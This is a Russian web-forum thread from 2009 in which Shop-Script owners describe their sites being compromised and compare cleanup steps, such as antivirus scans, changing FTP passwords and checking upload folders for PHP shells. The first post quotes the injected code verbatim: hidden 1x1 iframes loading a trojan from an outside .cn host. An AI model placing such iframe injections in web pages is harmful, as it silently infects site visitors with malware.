Мне "поломали" магазин?

Тема в разделе "Shop-script", создана пользователем SSSonar, 3 мар 2009.

Статус темы:
Закрыта.
  1. SSSonar

    SSSonar Создатель

    Регистр.:
    11 янв 2009
    Сообщения:
    43
    Симпатии:
    1
    На прошлой неделе было замечено, что мой сайт на SS Free не работает. Порылся в дримвьювере и вот что обнаружил.

    КАК и КТО мог прописать в код index.php (и ещё в одном месте) в самом конце страницы???:


    ?><html><body><iframe src="http://betstarwager.cn/in.cgi?cocacola70" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://betstarwager.cn/in.cgi?cocacola64" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://betstarwager.cn/in.cgi?cocacola62" width=1 height=1 style="visibility: hidden"></iframe></body></html>


    по ссылке не ходите, там троян!!!!

    Эту хрень вычистил, но в админку не могу войти. Залил на сайт файл forgot_password.php. Обновил пароль и логин в админку. Один фиг. Если неправильно вводить, то предупреждает, что данные не верные. Если вводить прально, то тупо не входит и все...
    Во блин))
     
  2. mirus

    mirus Создатель

    Регистр.:
    15 апр 2008
    Сообщения:
    38
    Симпатии:
    0
    была таже фигня от cocacola.тоже в двух файлах,один и з которых индекс.пхп. что это могла значить?сейчас тьфу-тьфу все нормально
     
  3. PAM3EC

    PAM3EC Создатель

    Регистр.:
    25 ноя 2008
    Сообщения:
    25
    Симпатии:
    1
    Проверь комп на вирусы, поменяй FTP пароли. И не сохраняй пароли в ftp клиентах или через что ты там сидишь... и вирус мог вставить код не только в index.php, так что проверь все файлы изменённые за последнее время. по идее они все изменены в одно и то же время.
     
  4. sounde

    sounde

    Регистр.:
    12 сен 2008
    Сообщения:
    391
    Симпатии:
    64
    Еще посмотри в папках product_files и products_pictures файлы php, там их быть не должно, если есть, значит залили шелл.
     
  5. IRIDON

    IRIDON

    Регистр.:
    3 авг 2008
    Сообщения:
    227
    Симпатии:
    12
    А чего ты ждал он ври версии? У нее почти все децкие дырки шопа, и их причем не заделали (ну мож позаделывали чет то). Короче ничего серёзного он фри версии не пытайся выжать.
     
  6. SSSonar

    SSSonar Создатель

    Регистр.:
    11 янв 2009
    Сообщения:
    43
    Симпатии:
    1
    я после этого вообще винду снес, так как от некоторых троянов так и не смог избавиться...пароли все поменял на хосте...файлы проверял по дате изменений... пока все норм..тфу, тфу... искал инфу в инете по аналогичной ситуации, вообще ничего не нашел.
    Оказывается, я не один. mirus, тоже пострадал(

    Добавлено через 1 минуту
    IRIDON, поентому щас и на локалке(поставл денвер) ваяю диз на новом движке)) А ты мне так с проблемкой категорий и не помог))))))))))))))))

    Добавлено через 4 минуты
    а ну и самое заподлячее - все кто заходил на сайт, автоматом отправлялся за трояном((
     
  7. PAM3EC

    PAM3EC Создатель

    Регистр.:
    25 ноя 2008
    Сообщения:
    25
    Симпатии:
    1
    У меня тоже такая фигня была месяц назад.
    Просто не надо пароли на компе хранить, вот и всё ;)

    Кстати, так же у меня был заражён .htaccess файл находящийся в корне сервера.
     
  8. SSSonar

    SSSonar Создатель

    Регистр.:
    11 янв 2009
    Сообщения:
    43
    Симпатии:
    1
    я на ftp через TComander сижу, щас зачищу логинистые поля. Т.е получается, что вполне возможно, что какой-нить Backdoor троян стырил пароли с ini файла командера и все, пипец?))

    Добавлено через 7 минут
    а, забыл добавить:

    зачистил всю хрень на сайте, снес винду. поставил новую. Накачал заплаток к ней. Поставил вместо нода каспера. Установил Anti-Malware(этот сразу нашел 16 спящих троянов в системе в архивах - каспер, нод молчали), установил и просканил Avz, Dr.Web, Trojan Remover. Затем воткнул Outpost Firewall (поставил в режим полной блокировки) и после этого чуть-чуть успокоился))))))))
     
  9. PAM3EC

    PAM3EC Создатель

    Регистр.:
    25 ноя 2008
    Сообщения:
    25
    Симпатии:
    1
    Так оно и есть.
     
  10. mdss

    mdss ♖♘♗♕♔♗♘♖

    Moderator
    Регистр.:
    20 фев 2007
    Сообщения:
    1.126
    Симпатии:
    668
    а никто не рассматривал вариант взлома хостера тупо? Получили рут и на все сайты повесили троя. Просто так что будут выборочно вешать маленькая вероятность
     
Статус темы:
Закрыта.